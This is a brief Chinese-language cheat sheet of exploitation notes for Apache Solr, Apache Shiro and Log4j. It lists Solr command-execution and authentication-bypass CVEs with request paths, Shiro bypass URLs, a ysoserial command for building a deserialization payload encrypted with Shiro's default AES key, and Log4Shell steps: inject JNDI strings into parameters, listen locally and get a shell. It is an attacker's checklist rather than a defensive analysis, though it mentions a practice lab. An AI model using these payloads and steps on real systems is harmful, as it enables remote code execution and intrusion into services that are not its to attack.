CVE-java-solr-log4j-shiro #
主要基于HTTP和Apache Lucene实现的全文搜索服务器。
8393端口
历史漏洞:https://avd.aliyun.com/search?q=Solr
CVE-2019-17558命令执行 #
用PY2.7来运行脚本
CVE-2019-0193-命令执行 #
Apache Solr < 8.2.0版本 条件1:Apache Solr的DataImportHandler启用了模块DataImportHandler(默认不会被启用) 条件2:Solr Admin UI未开启鉴权认证。(默认情况无需任何认证)
POC,点击Execute with this Confuguration
CVE-2024-45216 认证绕过 #
GET /solr/admin/info/properties:/admin/info/key 发包看返回
SHIRO 看remeberme #
CVE-2020-11989-绕过验证 #
Poc:/admin/%20 影响范围:Apache Shiro < 1.7.1
CVE-2022-32532 绕过鉴权 #
Poc: /permit/any
/permit/a%0any可绕过
SHIRO反序列 java -jar ysoserial.jar CommonsCollections5 “calc.exe” > payload.ser生成 使用AES默认密钥加密 > base64加密
LOG4J #
CVE-2021-44228 #
PAYLOAD能插入jndi的就插入进去试试
VULNHUB靶场
生成JNDI注入
本地监听
在参数直接插入进去
拿到SHELL
不成功可能:
对方没有log4j LOG4J版本高 JDK版本过高